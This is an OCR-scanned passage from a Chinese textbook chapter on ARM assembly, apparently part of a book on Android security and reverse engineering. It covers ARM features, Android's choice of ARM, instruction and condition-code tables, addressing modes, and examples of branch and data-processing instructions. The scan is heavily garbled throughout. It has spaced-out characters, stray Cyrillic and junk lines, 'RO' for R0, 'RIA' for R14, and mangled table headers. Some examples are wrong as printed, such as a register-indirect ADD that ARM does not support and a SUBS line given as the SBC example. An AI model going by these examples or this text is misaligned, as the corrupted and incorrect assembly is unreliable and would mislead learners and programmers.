采用 RISC 架构 的 ARM 处 理 器 一 般 具 有 如 下 所 示 的 特点 。 


DODDODUO 


体积 小 、 低 功 耗 、 低 成 本 、 高 性 能 。 

支持 Thumb 〈16 位 ) /ARM (3249) 双 指 令 集 ， 能 很 好 地 兼容 8 位 /16 位 器 件 。 
大 量 使 用 寄存 器 ， 指 令 执行 速度 更 快 。 

大 多 数 数据 操作 都 在 寄存 器 中 完成 。 

寻 址 方式 灵活 简单 ， 执 行 效率 高 。 

指令 长 度 固定 。 
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当前 市 场 中 90% 左 右 的 手机 都 包含 ARM 处 理 器 ， 由 此 可 见 ，ARM 处 理 器 在 手机 市 场 上 处 于 绝对 霸主 
地 位 ， 且 发 展 势头 迅猛。 基于 此 ，Google 选择 基于 ARM 开发 Android 系统 。 在 本 节 的 内 容 中 ， 将 简要 介绍 
Android 和 ARM 处 理 器 的 关系 。 


16.2.1 Android 支持 处 理 器 


在 当前 市 场 应 用 中 ，Android 支持 处 理 器 的 情况 说 明 如 下 所 示 。 


口 


口 


口 


ARM-Android: 最 早 支持 ， 支 持 得 最 完善 ， 主 要 用 在 手机 市 场 ， 目 前 积极 进军 上 网 本 、 智 能 家 居 
等 市 场 。 

X86+Android: 目前 已 经 支持 得 比较 完善 ， 例 如 ， 推 出 了 Atom+Android 的 上 网 本 ， 卖 点 在 于 支持 
Atom+Android 和 Atom+Windows 7 双 系 统 。 

MIPS+Android: 目前 在 移植 、 完 善 过 程 中 ， 主 要 目标 在 智能 家 电 、 上 网 本 领域 。 龙 芯 也 在 积极 支 


持 Android。 
© 


хеее 


口 Powpc+Android: 目前 在 移植 、 完 善 过 程 中 。 
另外 ,还 有 很 多 其 他 众多 处 理 器 厂商 在 移植 Android 到 其 现 有 的 处 理 器 ， 或 根据 Android 的 特性 研发 新 
的 处 理 器 。 


16.2.2 ARM 是 Android 的 首选 


在 Google 推出 Android 系统 之 前 ， 一 直 就 有 开发 自己 操作 系统 的 想法 。 与 此 同时 ， 竞 争 对 手 微软 也 在 
积极 进军 网 络 搜索 引擎 市 场 ， 目 前 搜索 器 Bing 正在 积极 蚕食 Google 的 市 场 份额 。 但 究竟 如 何 选择 切入 点 ， 
是 一 个 非常 关键 的 问题 。 

在 过 去 几 年 中 ， 智 能 手机 市 场 的 发 展 异常 迅猛 ， 移 动 互联 网 向 智能 手机 市 场 渗 透 的 应 用 越 来 越 广泛 和 
成 熟 ， 并 造就 了 苹果 iPhone 的 商业 奇迹 。 更 为 重要 的 是 ， 随 着 移动 应 用 的 发 展 ， 移 动 搜 索 将 成 为 Google 和 
微软 竞争 的 下 一 个 主 战场 。 对 此 ，Google 意识 到 移动 搜索 将 是 其 下 一 个 新 的 增长 点 。 

Google 最 终 选 择 了 手机 市 场 作为 其 切入 点 , 于 2007 年 推出 了 Android AZ. 那么 Google 为 这 款 系统 选 
择 什 么 样 的 硬件 平台 呢 ? 当前 90% 左 右 的 手机 都 包含 ARM 处 理 器 , 可 以 说 ARM 处 理 器 在 手机 市 场 上 处 于 
绝对 霸主 地 位 ， 并 且 发 展 势 头 迅猛 。 所 以 Google 选择 基于 ARM 开发 Android， 从 市 场 角度 上 讲 ， 是 顺 理 成 
章 的 事 。 

随 着 ARM 处 理性 能 的 提升 及 3G 网 络 的 日 趋 成 熟 , ARM 和 它 的 竞争 对 手 们 都 瞄准 了 3G 智能 手机 及 上 
网 本 市 场 。 现 在 处 理 器 厂商 之 间 的 竞争 不 仅 是 处 理 器 性 能 的 比较 ， 更 是 整个 生态 环境 的 较量 。 在 嵌入 式 乃 
至 PC 市 场 都 遵循 这 样 的 规律 。ARM 公司 的 特殊 经 营 模式 ， 更 是 决定 了 它 更 要 为 其 芯片 客户 提供 这 种 生态 
环境 。 在 智能 手机 或 上 网 本 产品 上 ， 除 了 处 理 器 ， 最 重要 的 就 是 操作 系统 和 用 户 应 用 程序 。 在 智能 手机 领 
域 最 成 功 的 操作 系统 和 用 户 应 用 莫 过 于 蔷 果 的 iOS。 虽 然 iPhone 手机 也 是 采用 ARM 处 理 器 , 但 每 款 iPhone 
手机 只 能 使 用 到 某 一 种 ARM 处 理 器 ， 且 iPhone 没有 开放 给 其 他 硬件 厂商 。 这 显然 不 能 满足 广大 ARM 芯片 
合作 厂商 的 要 求 。 

在 上 网 本 领域 , ARM 的 竞争 对 手 是 Intel, Intel 利用 其 支持 Windows 7 的 优势 , 已 经 抢先 占领 部 分 市 场 。 
而 最 打击 ARM 的 莫 过 于 微软 宣布 Windows 7 不 支持 ARM. 

而 以 上 种 种 市 场 环境 ， 使 ARM 迫切 需要 一 种 具有 Linux 系统 的 开放 、 免 费 、 性 能 卓越 ， 又 具有 iPhone 
那样 开发 方便 、 应 用 丰富 ， 最 好 还 能 有 微软 那样 有 影响 力 的 公司 来 维护 的 操作 系统 。 而 Google 的 Android 
系统 正好 满足 了 ARM 的 这 种 需求 。 

2009 年 11 月 17 日 ARM 宣布 启用 Android 解决 方案 中 心 ， 提 供 采 用 Android 进行 ARM 相关 产品 
开发 设计 运用 。ARM 表示 ， 除 了 来 自主 要 OEM 厂 、 芯 片 合作 伙伴 及 解决 方案 供 货 商 的 支持 外 ， 目 前 另 有 
超过 35 个 ARM Connected Community 成 员 加 入 这 个 计划 。 中 心 提供 了 一 应 俱全 的 建议 和 指引 ， 可 协助 开发 
人 员 取 得 所 需 的 工具 及 信息 ， 进 而 设计 创新 装置 满足 消费 者 需求 ， 还 可 针对 ARM 平台 上 的 Android 提供 优 
化 的 专属 开发 工具 、 解 决 方案 及 服务 。 


16.3 ARM 的 指令 系统 
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本 节 将 详细 介绍 ARM 指令 集 和 Thumb 指令 集 的 知识 ， 并 讲解 各 类 指令 对 应 的 寻 址 方式 。 通 过 对 本 节 
内 容 的 学 习 ， 和 希望 读者 能 了 解 ARM 微 处 理 器 所 支持 的 指令 集 及 具体 的 使 用 方法 。 


e. 
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16.3.1 ARM 指令 集 概述 


ARM 的 指令 集 是 加 载 /存储 型 的 , 即 指令 集 仅 能 处 理 寄 存 器 中 的 数据 , 而 且 处 理 结果 都 要 放 回 寄 存 器 中 ， 
而 对 系统 存储 器 的 访问 则 需要 通过 专门 的 加 载 /存储 指令 来 完成 。ARM 的 指令 集 可 以 分 为 跳 转 指令 、 数 据 处 
理 指令 、 程 序 状态 寄存 器 (PSR) 处 理 指令 、 加 载 /存储 指令 、 协 处 理 器 指令 和 异常 产生 指令 六 大 类 ， 具 体 
的 指令 及 功能 如 表 16-1 所 示 《〈 表 中 指令 为 基本 ARM 指令 ， 不 包括 派生 的 ARM 指令 ) 。 


表 16-1 ARM 指令 及 功能 描述 


B 记 符 指令 功能 描述 
ADC 带 进位 加 法 指令 
ADD 加 法 指令 
AND 逻辑 与 指令 
B 跳 转 指令 
BIC 位 清 零 指 令 
BL 带 返 回 的 跳 转 指令 
BLX 带 返 回 和 状态 切换 的 跳 转 指令 
BX 带 状态 切换 的 跳 转 指令 
CDP 协 处 理 器 数据 操作 指令 
CMN 比较 反 值 指令 
CMP 比较 指令 
EOR 异 或 指令 
LDC 存储 器 到 协 处 理 器 的 数据 传输 指令 
LDM 加 载 多 个 寄存 器 指令 
LDR 存储 器 到 寄存 器 的 数据 传输 指令 
MCR JA ARM 寄存 器 到 协 处 理 器 寄存 器 的 数据 传输 指令 
MLA 乘 加 运算 指令 
MOV 数据 传送 指令 
MRC 从 协 处 理 器 寄存 器 到 ARM 寄存 器 的 数据 传输 指令 
MRS 传送 CPSR 或 SPSR 的 内 容 到 通用 寄存 器 指令 
MSR 传送 通用 寄存 器 到 CPSR 或 SPSR 的 指令 
MUL 32 位 乘法 指令 
MLA 32 位 乘 加 指令 
MVN 数据 取 反 传送 指令 
ORR 逻辑 或 指令 
RSB 逆向 减法 指令 
RSC 带 借 位 的 逆向 减法 指令 
SBC 带 借 位 减法 指令 
STC 协 处 理 器 寄存 器 写 入 存储 器 指令 
STM 批量 内 存 字 写 入 指令 
STR 寄存 器 到 存储 器 的 数据 传输 指令 
SUB 减法 指令 
SWI 软件 中 断 指令 
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B) je 8 指令 功能 描述 
SWP 交换 指令 
TEQ 相等 测试 指令 
TST 位 测试 指令 


当 处 理 器 工作 在 ARM 状态 时 , 儿 乎 所 有 的 指令 均 根 据 CPSR 中 条 件 码 的 状态 和 指令 的 条 件 域 有 条 件 地 
执行 。 当 指令 的 执行 条 件 满足 时 ， 指 令 被 执行 ， 否 则 指令 被 忽略 。 每 一 条 ARM 指令 包含 4 位 的 条 件 码 ， 位 
于 指令 的 最 高 4 位 [31:28]。 条 件 码 共有 16 种 ， 每 种 条 件 码 可 用 两 个 字符 表示 ， 这 两 个 字符 可 以 漆 加 在 指令 
助 记 符 的 后 面 和 指令 同时 使 用 。 例 如 ， 跳 转 指令 В 可 以 加 上 后 级 EQ 变 为 BEQ， 表 示 “ 相 等 则 跳 转 ”， 即 
当 CPSR 中 的 Z 标志 置 位 时 发 生 跳 转 。 

在 16 种 条 件 标志 码 中 ， 只 有 15 种 可 以 使 用 ， 具 体 信息 如 表 16-2 Pros, 第 16 种 (1111) 为 系统 保留 ， 


暂时 不 能 使 用 。 
表 16-2 指令 的 条 件 码 
条 件 码 助 记 符 后 组 ж x # x 
0000 EQ Z 置 位 相等 
0001 NE Z 清 零 不 相等 
0010 Cs CE 无 符号 数 大 于 或 等 于 
0011 cc C 清 零 无 符号 数 小 于 
0100 MI N 置 位 负数 
0101 PL N 清 零 正 数 或 0 
0110 VS у 置 位 溢出 
0111 VC V 清 零 未 溢出 
1000 HI C 置 位 Z 清 零 无 符号 数 大 于 
1001 LS C 清 零 Z 署 位 无 符号 数 小 于 或 等 于 
1010 GE N 等 于 V 带 符号 数 大 于 或 等 于 
1011 LT NN 不 等 于 V 带 符号 数 小 于 
1100 GT Z 清 零 且 (N 等 于 V) 带 符号 数 大 于 
1101 LE Z 置 位 或 (N 不 等 于 V) 带 符号 数 小 于 或 等 于 
1110 AL 忽略 无 条 件 执行 


16.3.2 ARM 指令 的 寻 址 方式 


所 谓 寻 址 方式 就 是 处 理 器 根据 指令 中 给 出 的 地 址 信息 来 寻找 物理 地 址 的 方式 。 在 目前 应 用 领域 中 , ARM 
指令 系统 支持 如 下 几 种 常见 的 寻 址 方式 。 

(1) 立即 寻 址 

立即 寻 址 也 叫 立 即 数 寻 址 ， 这 是 一 种 特殊 的 寻 址 方式 ， 操 作 数 本 身 就 在 指令 中 给 出 ， 只 要 取出 指令 也 
就 取 到 了 操作 数 。 这 个 操作 数 被 称 为 立即 数 ， 对 应 的 寻 址 方式 也 就 叫做 立即 寻 址 。 例 如 以 下 指令 : 

ADD RO, RO, #1; RO—RO+1 

ADD RO, RO, #0x3f; RO—RO+0x3f 

在 以 上 两 条 指令 中 ， 第 二 个 源 操作 数 即 为 立即 数 ， 要 求 以 “#” 为 前 级 ， 对 于 以 十 六 进 制 表示 的 立即 
数 ， 还 要 求 在 “#” 后 加 上 0x 或 “&”。 


e. 


aioe лкм сеза? О 


(2) 寄存 器 寻 址 

寄存 器 寻 址 就 是 利用 寄存 器 中 的 数值 作为 操作 数 ， 这 种 寻 址 方式 是 各 类 微 处 理 器 经 常 采 用 的 一 种 方式 ， 
也 是 一 种 执行 效率 较 高 的 寻 址 方式 。 例 如 以 下 指令 。 

ADD RO, R1, R2; RO—R1+R2 

该 指令 的 执行 效果 是 将 寄存 器 RI ЯП R2 的 内 容 相 加 ， 其 结果 存放 在 寄存 器 RO 中 。 

(3) 寄存 器 间接 寻 址 

寄存 器 间接 寻 址 就 是 以 寄存 器 中 的 值 作为 操作 数 的 地 址 ， 而 操作 数 本 身 存 放 在 存储 器 中 。 例 如 以 下 


指令 。 
ADD RO, R1, [R2] ; RO—R1+[R2] 
LDR RO, [R1] ; RO--[R1] 
STR RO, [R1] :[R1]—-RO 


在 第 一 条 指令 中 ， 以 寄存 器 R2 的 值 作为 操作 数 的 地 址 ， 在 存储 器 中 取得 一 个 操作 数 后 与 R1 相 加 ， 结 
果 存 入 寄存 器 RO 中 。 
第 二 条 指令 将 以 RI 的 值 为 地 址 的 存储 器 中 的 数据 传送 到 RO 中 。 
第 三 条 指令 将 RO 的 值 传送 到 以 R1 的 值 为 地 址 的 存储 器 中 。 
(4) 基 址 变 址 寻 址 
基 址 变 址 寻 址 就 是 将 寄存 器 〈 该 寄存 器 一 般 称 做 基 址 寄存 器 ) 的 内 容 与 指令 中 给 出 的 地 址 偏 移 量 相 加 ， 
从 而 得 到 一 个 操作 数 的 有 效 地 址 。 变 址 寻 址 方式 常用 于 访问 某 基地 址 附近 的 地 址 单元 。 通 常 有 以 下 儿 种 采 


用 变 址 寻 址 方式 的 指令 形式 。 
LDR RO, [R1, #4] ;R0—[R1+4] 
LDR RO, [R1, #4]! ;R0—[R1+4]. R1-R1+4 
LDR RO, [R1], #4 ;R0—[R1]. R1—R1+4 
LDR RO, [R1,R2] ;R0—[R1+R2] 


在 第 一 条 指令 中 ， 将 寄存 器 RI 的 内 容 加 上 4 形成 操作 数 的 有 效 地 址 ， 从 而 取得 操作 数 存 入 寄存 器 КО 中 。 
在 第 二 条 指令 中 ， 将 寄存 器 RI 的 内 容 加 上 4 形成 操作 数 的 有 效 地 址 ， 从 而 取得 操作 数 存 入 寄存 器 RO 
中 ， 然 后 ，R1 的 内 容 自 增 4 个 字 节 。 
在 第 三 条 指令 中 ， 以 寄存 器 RI 的 内 容 作为 操作 数 的 有 效 地 址 ， 从 而 取得 操作 数 存 入 寄存 器 RO 中 ， 然 
后 ，R1 的 内 容 自 增 4 个 字 节 。 
在 第 四 条 指令 中 ， 将 寄存 器 RI 的 内 容 加 上 寄存 器 R2 的 内 容 形成 操作 数 的 有 效 地 址 ， 从 而 取得 操作 数 
存 入 寄存 器 RO 中 。 
(5) 多 寄存 器 寻 址 
采用 多 寄存 器 寻 址 方式 ， 一 条 指令 可 以 完成 多 个 寄存 器 值 的 传送 。 通 过 这 种 寻 址 方式 ， 可 以 用 一 条 指 
令 完成 传送 最 多 16 个 通用 寄存 器 的 值 。 例 如 以 下 指令 。 
LDMIA RO, (R1, R2, R3, R4) ; R1—[RO] 
; R2—[R0+4] 
; R3—[R0+8] 
; R4—[R0+12] 
该 指令 的 后 级 IA 表示 在 每 次 执行 完 加 载 /存储 操作 后 ，R0 按 字 长 度 增 加 ， 因 此 ， 指 令 可 将 连续 存储 单 
元 的 值 传送 到 R1 一 R4。 
(6) 相对 寻 址 
与 基 址 变 址 寻 址 方式 相 类 似 ， 相 对 寻 址 以 程序 计数 器 PC 的 当前 值 为 基地 址 ， 指 令 中 的 地 址 标号 作为 偏 
移 量 ， 将 两 者 相 加 之 后 得 到 操作 数 的 有 效 地 址 。 以 下 程序 段 完成 子 程序 的 调用 和 返回 ， 跳 转 指令 BL 采用 了 


相对 寻 址 方式 。 
© 


BL NEXT ; 跳 转 到 子 程序 NEXT 处 执行 


LU Android nse fo B RR 

NEXT 

MOV PC, LR ; 从 子 程序 返回 

CD 堆栈 寻 址 

堆栈 是 一 种 数据 结构 ， 按 先进 后 出 〈First In Last Out, FILO) 的 方式 工作 ， 使 用 一 个 称 做 堆栈 指针 的 专 
用 寄存 器 指示 当前 的 操作 位 置 ， 堆 栈 指针 总 是 指向 栈 项 。 

当 堆 栈 指针 指向 最 后 压 入 堆栈 的 数据 时 ， 称 为 满 堆栈 (Full Stack) ， 而 当 堆 栈 指针 指向 下 一 个 将 要 放 
入 数据 的 空位 置 时 ， 称 为 空 堆栈 (Empty Stack) . 

同时 ， 根 据 堆栈 的 生成 方式 ， 又 可 以 分 为 递增 堆栈 CAscending Stack) 和 递减 堆栈 (Decending Stack) , 
当 扒 栈 由 低地 址 向 高 地 址 生成 时 ， 称 为 递增 堆栈 ， 当 堆栈 由 高 地 址 向 低地 址 生成 时 ， 称 为 递减 堆栈 。 这 样 
就 有 4 种 类 型 的 堆栈 工作 方式 ，ARM 微 处 理 器 支持 如 下 4 种 类 型 的 堆栈 工作 方式 。 

О 满 递 增 堆栈 : 堆栈 指针 指向 最 后 压 入 的 数据 ， 且 由 低地 址 向 高 地 址 生成 。 

О 满 递 减 堆栈 : 堆栈 指针 指向 最 后 压 入 的 数据 ， 且 由 高 地 址 向 低地 址 生成 。 

О 空 递增 堆栈 : 堆栈 指针 指向 下 一 个 将 要 放 入 数据 的 空位 置 ， 且 由 低地 址 向 高 地 址 生成 。 

О 空 递减 堆栈 ， 堆栈 指针 指向 下 一 个 将 要 放 入 数据 的 空位 置 ， 且 由 高 地 址 向 低地 址 生成 。 


16.3.3 ARM 指令 


ARM 指令 集 的 六 大 类 指令 分 别 包括 跳 转 指令 、 数 据 处 理 指令 、 乘 法 指令 与 乘 加 指令 、 程 序 状态 寄存 器 
访问 指令 、 加 载 /存储 指令 、 批 量 数据 加 载 /存储 指令 ， 本 书 将 进行 详细 介绍 。 


1. 跳 转 指令 


跳 转 指令 用 于 实现 程序 流程 的 跳 转 ， 在 ARM 程序 中 。 有 如 下 两 种 方法 可 以 实现 程序 流程 的 跳 转 : 

口 使 用 专门 的 跳 转 指令 。 

а 直接 向 程序 计数 器 PC 写 入 跳 转 地 址 值 。 

通过 向 程序 计数 器 PC 写 入 跳 转 地 址 值 ， 可 以 实现 在 4GB 的 地 址 空间 中 任意 跳 转 ， 在 跳 转 之 前 结合 使 
用 如 下 类 似 指令 ， 可 以 保存 将 来 的 返回 地 址 值 ， 从 而 实现 在 4GB 连续 的 线性 地 址 空间 的 子 程序 调用 。 


MOVLR, PC 
在 ARM 指令 集中 , 通过 跳 转 指 令 可 以 完成 从 当前 指令 向 前 或 向 后 的 32MB 地 址 空间 的 跳 转 , 包括 以 下 
4 条 指令 。 
口 B: 跳 转 指令 。 


口 BL: 带 返 回 的 跳 转 指令 。 

口 BLX: 带 返 回 和 状态 切换 的 跳 转 指 令 。 

口 BX: 带 状 态 切换 的 跳 转 指 令 。 

(1) B 指 令 

B 指令 的 格式 如 下 。 

B{ 条 件 } ”目标 地 址 

B 指令 是 最 简单 的 跳 转 指 令 。 一 旦 遇 到 一 个 B 指令 ，ARM 处 理 器 将 立即 跳 转 到 给 定 的 目标 地 址 ， 从 
那里 继续 执行 。 注 意 存储 在 跳 转 指令 中 的 实际 值 是 相对 当前 PC 值 的 一 个 偏 移 量 ， 而 不 是 一 个 绝对 地 址 ， 其 
值 由 汇编 器 来 计算 〈 参 考 寻 址 方式 中 的 相对 寻 址 ) ， 它 是 24 位 有 符号 数 ， 左 移 两 位 后 有 符号 数 被 扩展 为 32 
位 ， 表 示 的 有 效 偏 移 为 26 位 〈 前 后 32MB 的 地 址 空间 ) 。 例 如 以 下 指令 。 

B Label ; 程序 无 条 件 跳 转 到 标号 Label 处 执行 
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CMPR1, #0; 当 CPSR 寄存 器 中 的 乙 条 件 码 置 位 时 ， 程 序 跳 转 到 标号 Label 处 执行 
BEQ Label 
(2) BL 指令 
BL 指令 的 格式 如 下 。 
BL{ 条 件 } 目标 地 址 
BL 是 另 一 个 跳 转 指令 ， 但 跳 转 之 前 ， 会 在 寄存 器 RIA 中 保存 PC 的 当前 内 容 ， 因 此 ， 可 以 通过 将 RIA 
的 内 容重 新 加 载 到 PC 中 来 返回 到 跳 转 指令 之 后 的 那个 指令 处 执行 。 该 指令 是 实现 子 程序 调用 的 一 个 基本 但 
常用 的 手段 。 例 如 以 下 指令 。 
BL Label; 
当 程 序 无 条 件 跳 转 到 标号 Label 处 执行 时 ， 同 时 将 当前 的 PC 值 保存 到 R14 中 。 
(3) BLX 指令 
BLX 指令 的 格式 如 下 。 
BLX 目标 地 址 
BLX 指令 从 ARM 指令 集 跳 转 到 指令 中 所 指定 的 目标 地 址 , 并 将 处 理 器 的 工作 状态 由 ARM 状态 切换 到 
Thumb 状态 ， 该 指令 同时 将 PC 的 当前 内 容 保存 到 寄存 器 RIA 中 。 因 此 ， 当 子 程序 使 用 Thumb 指令 集 ， 而 
调用 者 使 用 ARM 指令 集 时 ， 可 以 通过 BLX 指令 实现 子 程序 的 调用 和 处 理 器 工作 状态 的 切换 。 同 时 ， 子 程 
序 的 返回 可 以 通过 将 寄存 器 R14 值 复制 到 PC 中 完成 。 
(4) BX 指令 
BX 指令 的 格式 如 下 。 
BX{ 条 件 } 目标 地 址 
BX 指令 跳 转 到 指令 中 所 指定 的 目标 地 址 ， 目 标 地 址 处 的 指令 既 可 以 是 ARM 指令 ， 也 可 以 是 Thumb 
指令 。 


2. 数据 处 理 指令 


数据 处 理 指 令 可 分 为 数据 传送 指令 、 算 术 逻 辑 运算 指令 和 比较 指令 等 ， 具 体 说 明 如 下 所 示 。 

口 数据 传送 指令 用 于 在 寄存 器 和 存储 器 之 间 进 行 数据 的 双向 传输 。 

о 算术 逻辑 运算 指令 完成 常用 的 算术 与 逻辑 的 运算 ， 该 类 指令 不 但 将 运算 结果 保存 在 目的 寄存 器 中 ， 
同时 更 新 CPSR 中 的 相应 条 件 标志 位 。 

О 比较 指令 不 保存 运算 结果 ， 只 更 新 CPSR 中 相应 的 条 件 标志 位 。 

数据 处 理 指 令 包括 如 下 子 指令 。 

MOV: 数据 传送 指令 。 

MVN: 数据 取 反 传送 指令 。 

CMP: 比较 指令 。 

CMN: 反 值 比较 指令 。 

TST: 位 测试 指令 。 

TEQ:， 相 等 测试 指令 。 

ADD: 加 法 指令 。 

ADC: 带 进位 加 法 指令 。 

SUB: 减法 指令 。 

SBC:” 带 借 位 减法 指令 。 

RSB: 逆向 减法 指令 。 

RSC:” 带 借 位 的 逆向 减法 指令 。 

AND: 逻辑 与 指令 。 
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roid 系统 安全 和 反 编 译 实战 


O ORR: 逻辑 或 指令 。 

О EOR: 逻辑 异 或 指令 。 

口 BIC: 位 清除 指令 。 

(1) MOV 指令 

MOV 指令 的 格式 为 : 

MOV{ 条 件 KS} 目的 寄存 器 ， 源 操作 数 

MOV 指令 可 完成 从 另 一 个 寄存 器 、 被 移 位 的 寄存 器 或 将 一 个 立即 数 加 载 到 目的 寄存 器 。 其 中 S 选项 决 
定 指令 的 操作 是 否 影 响 CPSR 中 条 件 标志 位 的 值 ， 当 没有 S 时 指令 不 更 新 CPSR 中 条 件 标志 位 的 值 。 

下 面 是 MOV 指令 的 演示 示例 : 


MOV R1, RO ; 将 寄存 器 RO 的 值 传送 到 寄存 器 R1 
MOV PC, R14 ; 将 寄存 器 R14 的 值 传送 到 PC， 常 用 于 子 程序 返回 
MOV R1, КО, LSL#3 ; 将 寄存 器 RO 的 值 左 移 3 位 后 传送 到 R1 
(2) MVN 指令 
MVN 指令 的 格式 为 : 


MVN{ 条 件 MS} 目的 寄存 器 , 源 操作 数 

MVN 指令 可 完成 从 另 一 个 寄存 器 、 被 移 位 的 寄存 器 或 将 一 个 立即 数 加 载 到 目的 寄存 器 。 与 MOV 指令 
不 同 之 处 在 于 传送 之 前 按 位 被 取 反 了 ， 即 把 一 个 被 取 反 的 值 传送 到 目的 寄存 器 中 。 其 中 s 决定 指令 的 操作 
是 否 影响 CPSR 中 条 件 标志 位 的 值 ， 当 没有 S 时 指令 不 更 新 CPSR 中 条 件 标志 位 的 值 。 

指令 示例 : 

MVN RO, #0 

将 立即 数 0 取 反 传送 到 寄存 器 RO 中 ， 完 成 后 R0=-1。 

(3) CMP 指令 

CMP 指令 的 格式 为 : 

CMP{ 条 件 } 操作 数 1, 操作 数 2 

CMP 指令 用 于 把 一 个 寄存 器 的 内 容 和 另 le s n, 同时 更 新 CPSR 中 条 
件 标志 位 的 值 。 该 指令 进行 一 次 减法 运算 ， 但 不 存储 结果 ， 只 更 改 条 件 标志 位 。 标 志 位 表示 的 是 操作 数 1 
与 操作 数 2 的 关系 〈 大 、 小 、 相 等 ) ， 例 如 ， 当 操作 数 1 大 于 操作 数 2， 则 此 后 的 有 GT 后 级 的 指令 将 可 
以 执行 。 

指令 示例 : 

CMP R1, RO; 将 寄存 器 КІ 的 值 与 寄存 器 RO 的 值 相 减 ， 并 根据 结果 设置 CPSR 的 标志 位 

CMP R1, #100 ; 将 寄存 器 R1 的 值 与 立即 数 100 相 减 ， 并 根据 结果 设置 CPSR 的 标志 位 

(4) CMN 指令 

CMN 指令 的 格式 为 : 

CMN{ 条 件 } 操作 数 1， 操 作 数 2 

CMN 指令 用 于 把 一 个 寄存 器 的 内 容 和 另 一 个 寄存 器 的 内 容 或 立即 数 取 反 后 进行 比较 ， 同 时 更 新 CPSR 
中 条 件 标志 位 的 值 。 该 指令 实际 完成 操作 数 1 和 操作 数 2 相 加 ， 并 根据 结果 更 改 条 件 标志 位 。 

指令 示例 : 

CMN R1，R0 ; 将 寡 存 器 КІ 的 值 与 寄存 器 RO 的 值 相 加 ， 并 根据 结果 设置 CPSR 的 标志 位 

CMNR1, #100; 将 寄存 器 R1 的 值 与 立即 数 100 相 加 ， 并 根据 结果 设置 CPSR 的 标志 位 

(5) TST 指令 

TST 指令 的 格式 为 : 

TST{ 条 件 } 操作 数 1， 操 作 数 2 

TST 指令 用 于 把 一 个 寄存 器 的 内 容 和 另 一 个 寄存 器 的 内 容 或 立即 数 进行 按 位 与 运算 ， 并 根据 运算 结果 
更 新 CPSR 中 条 件 标志 位 的 值 。 操 作 数 1 是 要 测试 的 数据 ,而 操作 数 2 是 一 个 位 掩 码 , 该 指令 一 般 用 来 检测 


@ 


第 16 章 ARM 汇编 逆向 


是 否 设置 了 特定 的 位 。 


指令 示例 : 

TSTR1, #%1; 用 于 测试 在 寄存 器 R1 中 是 否 设置 了 最 低位 〈% 表 示 二 进 制 数 ) 

TST R1，#0xffe ; 将 寄存 器 R1 的 值 与 立即 数 0xffe 按 位 与 ， 并 根据 结果 设置 CPSR 的 标志 位 

(6) TEQ 指令 

TEQ 指令 的 格式 为 : 

TEQ{ 条 件 } 操作 数 1， 操 作 数 2 

ТЕО 指令 用 于 把 一 个 寄存 器 的 内 容 和 另 一 个 寄存 器 的 内 容 或 立即 数 进行 按 位 的 异 或 运算 ， 并 根据 运算 


结果 更 新 CPSR 中 条 件 标志 位 的 值 。 该 指令 通常 用 于 比较 操作 数 1 和 操作 数 2 是 否 相等 。 


指令 示例 : 
ТЕО R1, R2 ; 将 寄存 器 R1 的 值 与 寄存 器 R2 的 值 按 位 异 或 ， 并 根据 结果 设置 CPSR 的 标志 位 
(7) ADD 指令 
ADD 指令 的 格式 为 : 
ADD{ 条 件 MS} 目的 寄存 器 ,操作 数 1， 操 作 数 2 
ADD 指令 用 于 把 两 个 操作 数 相 加 ， 并 将 结果 存放 到 目的 寄存 器 中 。 操 作 数 1 应 是 一 个 寄存 器 ， 操 作 数 


2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 


指令 示例 : 
ADD RO, R1, R2; RO = R1+ R2 
ADD RO, R1, #256 ; RO = R1 + 256 
ADD RO, R2, R3, LSL#1 ; RO = R2 + (R3 << 1) 
(8) ADC 指令 
ADC 指令 的 格式 为 : 
ADC{ 条 件 MS} 目的 寄存 器 ,操作 数 1， 操 作 数 2 
ADC 指令 用 于 把 两 个 操作 数 相 加 ， 再 加 上 CPSR 中 的 C 条 件 标 志 位 的 值 ， 并 将 结果 存放 到 目的 寄存 器 


。 它 使 用 一 个 进位 标志 位 ， 这 样 就 可 以 做 比 32 位 大 的 数 的 加 法 ， 注 意 不 要 忘记 设置 S 后 级 来 更 改进 位 标 
。 操 作 数 1 应 是 一 个 寄存 器 ， 操 作 数 2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 


以 下 指令 序列 完成 两 个 128 位 数 的 加 法 ， 第 一 个 数 由 高 到 低 存放 在 寄存 器 R7 一 R4， 第 二 个 数 由 高 到 低 


存放 在 寄存 器 R11 一 R8， 运 算 结 果 由 高 到 低 存放 在 寄存 器 R3 一 R0。 


ADDS RO, R4, R8 ; 加 低 端 的 字 

ADCS R1, R5, R9 ; 加 第 二 个 字 ， 带 进位 

ADCS R2, R6, R10 ; 加 第 三 个 字 ， 带 进位 

ADC R3, R7, R11 ; 加 第 四 个 字 ， 带 进位 

(9) SUB 指令 

SUB 指令 的 格式 为 : 

SUB{ 条 件 HS} 目的 寄存 器 ， 操 作 数 1， 操 作 数 2 

SUB 指令 用 于 把 操作 数 1 减 去 操作 数 2， 并 将 结果 存放 到 目的 寄存 器 中 。 操 作 数 1 应 是 一 个 寄存 器 ， 操 


作 数 2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 该 指令 可 用 于 有 符号 数 或 无 符号 数 的 减法 运算 。 


指令 示例 : 
SUB RO, R1, R2; RO=R1-R2 
SUB RO, R1, #256 ; RO = R1 - 256 
SUB RO, R2, R3, LSL#1 ; RO = R2 - (R3 << 1) 
(10 SBC 指令 
SBC 指令 的 格式 为 : 
SBC{ 条 件 MS} 目的 寄存 器 ， 操 作 数 1， 操 作 数 2 
SBC 指令 用 于 把 操作 数 1 减 去 操作 数 2， 再 减 去 CPSR 中 的 С 条 件 标志 位 的 反 码 ， 并 将 结果 存放 到 目 
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的 寄存 器 中 。 操 作 数 1 应 是 一 个 寄存 器 ， 操 作 数 2 可 以 是 一 个 寄存 器 、 被 移 位 的 寄存 器 或 一 个 立即 数 。 该 
指令 使 用 进位 标志 表示 借 位 ， 这 样 就 可 以 做 大 于 32 位 的 减法 ， 注 意 不 要 忘记 设置 S 后 级 来 更 改进 位 标志 。 
该 指令 可 用 于 有 符号 数 或 无 符号 数 的 减法 运算 。 

指令 示例 : 

SUBS RO, R1, R2; RO = R1 - R2- ! C, 并 根据 结果 设置 CPSR 的 进位 标志 位 

(11) RSB 指令 

RSB 指令 的 格式 为 : 

RSB{ 条 件 MS} 目的 寄存 器 ， 操 作 数 1， 操 作 数 2 

